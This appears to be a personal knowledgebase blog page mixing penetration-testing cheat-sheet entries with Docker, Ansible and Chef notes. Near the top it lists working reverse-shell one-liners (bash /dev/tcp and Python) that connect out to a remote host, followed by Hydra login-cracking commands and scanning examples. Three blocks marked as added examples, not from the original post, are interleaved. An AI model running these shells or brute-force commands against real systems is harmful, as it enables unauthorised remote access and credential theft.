Tikejhya: Ashish Nepal

Knowledgebase

reverse shell


Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

steganography & exiftool


Using steganography, secret messages can be embedded into images.

Use exiftool to discover a base64-encoded message stored in the image metadata:

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg
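The same metadata check done without exiftool, as an added example that is not part of the original post: a small JPEG marker-segment walker that pulls out the COM (Comment) text exiftool would display and decodes any entry that looks like base64. The sample JPEG bytes are constructed inside the block.

```python
#!/usr/bin/env python3
# Added example, not from the page: walk a JPEG's marker segments, extract the
# COM ("Comment") text, and report entries that decode as base64 messages.
import base64
import binascii
import re
import struct

# Long runs of base64 alphabet only; short or spaced text is treated as plain.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]{8,}={0,2}$")

def jpeg_segments(data):
    """Yield (marker, payload) for each marker segment before the scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):   # EOI, or SOS: entropy-coded data follows
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def find_hidden_messages(data):
    """Return the decoded text of every base64-looking COM (0xFE) segment."""
    found = []
    for marker, payload in jpeg_segments(data):
        if marker != 0xFE:
            continue
        text = payload.strip(b"\x00 \r\n")
        if not B64_RE.match(text):
            continue
        try:
            found.append(base64.b64decode(text, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            pass                     # looked like base64 but was not a text message
    return found

def com_segment(text):
    """Build a COM segment; the 16-bit length field counts itself."""
    return b"\xff\xfe" + struct.pack(">H", len(text) + 2) + text

# Constructed sample: SOI, one COM segment carrying a base64 body, EOI. Not a
# displayable picture, but enough structure for the metadata walk above.
SAMPLE_JPEG = b"\xff\xd8" + com_segment(base64.b64encode(b"meet at 0700")) + b"\xff\xd9"
```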


hydra [by example]


hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker which supports numerous protocols to attack.


Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form "/path/index.php:key=^PASS^:invalid key" -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

Quick tip: to submit both a username and a password, use two placeholders in the form string: "user=^USER^&pass=^PASS^:Bad login"

Host = 172.28.128.5
Method = http-post-form
URL = /path/index.php
Form parameters = key=^PASS^
Failure response = invalid key
Users file = users.txt
Password file = /usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
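The defender's side of the two Hydra patterns above (-l user -P passlist versus -L userlist -p defaultpw), as an added example that is not from the original post: classify login-failure records per source as brute force or password spraying. The window, thresholds and sample events are assumptions constructed for the block.

```python
#!/usr/bin/env python3
# Added example, not from the page: detection logic for the two Hydra usage
# patterns, run over constructed login-failure records. Many failures against
# one account from one source (-l user -P passlist) is brute force; one failure
# each against many accounts (-L userlist -p defaultpw) is a password spray.
from collections import defaultdict

def classify_sources(events, window=60, min_failures=20, min_users=10):
    """events: iterable of (epoch_seconds, src_ip, username) login failures.
    Returns {src_ip: "brute-force" | "spray"} for each source that crosses a
    threshold within some sliding window of `window` seconds (assumed values)."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    verdicts = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until it spans <= window seconds
            while fails[end][0] - fails[start][0] > window:
                start += 1
            span = fails[start:end + 1]
            users = {u for _, u in span}
            if len(users) >= min_users:
                verdicts[src] = "spray"
                break
            if len(span) >= min_failures and len(users) == 1:
                verdicts[src] = "brute-force"
                break
    return verdicts

# Constructed sample: 10.0.0.9 hammers one mailbox (25 failures in 25 s),
# 10.0.0.7 tries one password against 12 accounts, 10.0.0.5 mistypes twice.
SAMPLE_EVENTS = (
    [(1000 + i, "10.0.0.9", "boris") for i in range(25)]
    + [(2000 + i, "10.0.0.7", "user%02d" % i) for i in range(12)]
    + [(3000, "10.0.0.5", "alice"), (3004, "10.0.0.5", "alice")]
)
```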


nmap

nmap -p- -Pn -n 172.28.128.3

-p-: scan every port from 1 through 65535 (the short form of -p1-65535).

-Pn: treat all hosts as online and skip host discovery.

-n/-R: never do DNS resolution / always resolve [default: sometimes].

nmap -sV -T4 -p-65535 172.28.128.3

-sV: enables Nmap version detection, which probes each open port to identify the service and version listening there.

-T4: the "aggressive" timing template; it prohibits the dynamic scan delay from exceeding 10 ms for TCP ports (-T5 caps that value at 5 ms).

-p-65535: scan every port up to 65535; with no start port given, Nmap begins at 1, so this is equivalent to -p-.

Reference for the -T values: the Nmap timing template table (T0 through T5).


netdiscover

Netdiscover is a simple ARP scanner which can be used to scan for live hosts in a network.

Scan the range 172.28.128.0/24 through interface eth0:
netdiscover -i eth0 -r 172.28.128.0/24

-i device: your network device

Options available:

  -r range: scan a given range instead of auto scan. 172.28.128.0/24, /16, /8
  -l file: scan the list of ranges contained in the given file
  -p passive mode: do not send anything, only sniff
  -m file: scan the list of known MACs and host names
  -F filter: customize pcap filter expression (default: "arp")
  -s time: time to sleep between each ARP request (milliseconds)
  -n node: last IP octet used for scanning (from 2 to 253)
  -c count: number of times to send each ARP request (for nets with packet loss)
  -f enable fast mode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode
  -S enable sleep time suppression between each request (hardcore mode)
  -P print results in a format suitable for parsing by another program
  -N do not print header. Only valid when -P is enabled.
  -L in parsable output mode (-P), continue listening after the active scan is completed


Netcat

Testing for an open port with Netcat

nc -zv 192.168.1.15 22

In the command above, the flags are:

  1. -z – sets nc to simply scan for listening daemons, without actually sending any data to them.
  2. -v – enables verbose mode.

Pass -u to test a UDP port instead of TCP.

Using Netcat for File Transfers

Receiver

nc -l -p 3334 > file

will begin listening on port 3334.

Sender

nc -w 3 [IP_of_destination] 3334 < file

Compression can be used too.

Receiver

nc -l -p 3334 | uncompress -c | tar xvfp -

Sender

tar cfp - /some/dir | compress -c | nc -w 3 [IP_of_destination] 3334

private docker registry

Private Docker registry using Let's Encrypt certificates and htpasswd authentication.

#Creating letsencrypt:

./letsencrypt-auto certonly -a manual --rsa-key-size 4096 -d www.tikejhya.com -d registry.tikejhya.com --debug

#Creating auth file

docker run --entrypoint htpasswd registry:2 -Bbn testuser testpassword > auth/htpasswd

#If required (remove an existing registry container first):

docker stop registry && docker rm -v registry

#Create registry
docker run -d -p 443:5000 --restart=always --name registry \
-v `pwd`/auth:/auth \
-e "REGISTRY_AUTH=htpasswd" \
-e "REGISTRY_AUTH_HTPASSWD_REALM=Registry Realm" \
-e REGISTRY_AUTH_HTPASSWD_PATH=/auth/htpasswd \
-v `pwd`/certs:/certs \
-e REGISTRY_HTTP_TLS_CERTIFICATE=/certs/mydomain_public.crt \
-e REGISTRY_HTTP_TLS_KEY=/certs/mydomain_private.key \
registry:2

#Test login
docker login registry.tikejhya.com

#Pull some image
docker pull php:php-fpm
#Tag image into newly created registry

docker tag php:php-fpm registry.tikejhya.com/my-php

#push image to repo

docker push registry.tikejhya.com/my-php

#Lets pull from remote server:

docker login registry.tikejhya.com
docker --config ~/.docker pull registry.tikejhya.com/php-fpm

docker pull registry.tikejhya.com/bmi-php

dynamic inventory ec2.py with multiple inventory

When running multiple inventories with ec2.py, you also need to copy the ec2.ini file to the location where ec2.py lives.

My setup had four different environments, and I did not want to copy ec2.py into every inventory; I wanted a single ec2.py with one ec2.ini per environment (which is probably what many people want to do).

root@tikejhya:/etc/ansible# tree
.
├── development
│   └── ec2.ini
├── ec2.py
├── ext.py
├── ext.pyc
├── prod
│   └── ec2.ini
├── roles
├── staging
│   └── ec2.ini
└── uat
    ├── base
    └── ec2.ini

Since there was no real out-of-the-box solution, I created the ext.py below and imported it into ec2.py.

#ec2.py (numbers are line positions in ec2.py; ++ marks the added lines)

135 from ansible.module_utils import ec2 as ec2_utils
++ 136 from ext import mapper
137
138 HAS_BOTO3 = False

And:

487         help='Use boto profile for connections to EC2')
++ 488     parser.add_argument('--my_env', action='store', dest='my_env',
++ 489                         help='Use env for variable')
490     self.args = parser.parse_args()
491
++ 492     mapper(self.args.my_env)

#ext.py
#!/usr/bin/python
import os


def mapper(self_args_my_env):
    # Point ec2.py at this environment's ec2.ini and select the matching boto profile
    os.environ["EC2_INI_PATH"] = "/etc/ansible/" + self_args_my_env + "/ec2.ini"
    os.environ["AWS_PROFILE"] = "profile_" + self_args_my_env

This lets me run ansible with ec2.py followed by an environment parameter and have it use the matching boto profile:

ec2.py --my_env uat --list
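A hardened variant of mapper(), added here and not part of the original post: the page's version builds a filesystem path and a profile name straight from the --my_env argument, so this version checks the name against a pattern and an allowlist and verifies the resolved ec2.ini path stays under /etc/ansible. The allowlist is taken from the directory tree above; the naming pattern and base directory handling are assumptions.

```python
#!/usr/bin/env python3
# Added example, not the page's ext.py: validate the --my_env value before it
# becomes part of a path and an AWS profile name.
import os
import re

ANSIBLE_DIR = "/etc/ansible"                      # same base dir as the page
ENV_NAME = re.compile(r"^[a-z][a-z0-9_-]{0,31}$")  # assumed naming rule

def resolve_env(env_name, base_dir=ANSIBLE_DIR, allowed=None):
    """Return (ini_path, profile) for a validated environment name.

    Raises ValueError if the name is not a plain identifier, is not in the
    allowlist (when one is given), or resolves to a path outside base_dir.
    """
    if not ENV_NAME.match(env_name):
        raise ValueError("invalid environment name: %r" % env_name)
    if allowed is not None and env_name not in allowed:
        raise ValueError("unknown environment: %r" % env_name)
    root = os.path.realpath(base_dir)
    ini_path = os.path.realpath(os.path.join(root, env_name, "ec2.ini"))
    if os.path.commonpath([root, ini_path]) != root:
        raise ValueError("ec2.ini path escapes %s" % root)
    return ini_path, "profile_" + env_name

def is_valid_env(env_name, base_dir=ANSIBLE_DIR, allowed=None):
    """Boolean form of resolve_env() for callers that only need a yes/no."""
    try:
        resolve_env(env_name, base_dir, allowed)
        return True
    except ValueError:
        return False

def mapper(self_args_my_env, allowed=("development", "staging", "uat", "prod")):
    """Same contract as the page's mapper(): set EC2_INI_PATH and AWS_PROFILE,
    but only after the environment name has been validated."""
    ini_path, profile = resolve_env(self_args_my_env, allowed=allowed)
    os.environ["EC2_INI_PATH"] = ini_path
    os.environ["AWS_PROFILE"] = profile
    return ini_path, profile
```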

chef [rendering template]

filebeat:
  prospectors:
<% @rolename.each do |role| %>
    # Some prospector should be passed in here based on role
    <%= render "filebeat-syslog.yaml.erb" -%>
    <%= render "filebeat-#{role}.yaml.erb" -%>
<% end %>
  registry_file: <%= @path_registry %>

output:
  logstash:
    hosts: ["<%= node.filebeats.logstashhost %>:<%= node.filebeats.logstashport %>"]
    #tls:
      #certificate_authorities: ["/etc/pki/tls/certs/beats.crt"]
      #insecure: true

shipper:

logging:
  files:
    rotateeverybytes: 10485760 # = 10MB

#In the rendering above, the variables come from the recipe, which loads them from attributes.

$ cat attributes/default.rb
default['filebeat']['apache_log_file'] = ['/var/log/httpd/*error_log', '/var/log/httpd/*access_log']

$ cat recipes/config.rb
rolename = node.roles

template '/etc/filebeat/filebeat.yml' do
  source 'filebeat-default.yaml.erb'
  mode '0440'
  owner 'root'
  group 'root'
  variables(
    path_apache_log_file: node['filebeat']['apache_log_file'],
    input_type: node['filebeat']['input_type'],
    document_type: node['filebeat']['document_type'],
    path_registry: node['filebeat']['registry'],
    :rolename => rolename,
  )
end

$ cat templates/default/filebeat-default.yaml.erb
(the same template shown at the top of this post)
$ cat templates/default/filebeat-magento.yaml.erb
<% @path_apache_log_file.each do |j| %>
    -
      paths:
        - <%= j %>
      input_type: <%= @input_type %>
<% if j =~ /error_log/ %>
      document_type: apache-error-log
<% else %>
      document_type: apache-access-log
<% end %>
      fields:
        service:
          zone: <%= @zone %>
<% end %>

chef [templates]

template "/data/project/config.inc" do
  source 'config.inc.erb'
  variables(
    smtp_host: node['smtp']['host'],
    smtp_port: node['smtp']['port'],
    suffix: suffix,
  )
  owner 'apache'
  group 'apache'
  mode '0744'
end

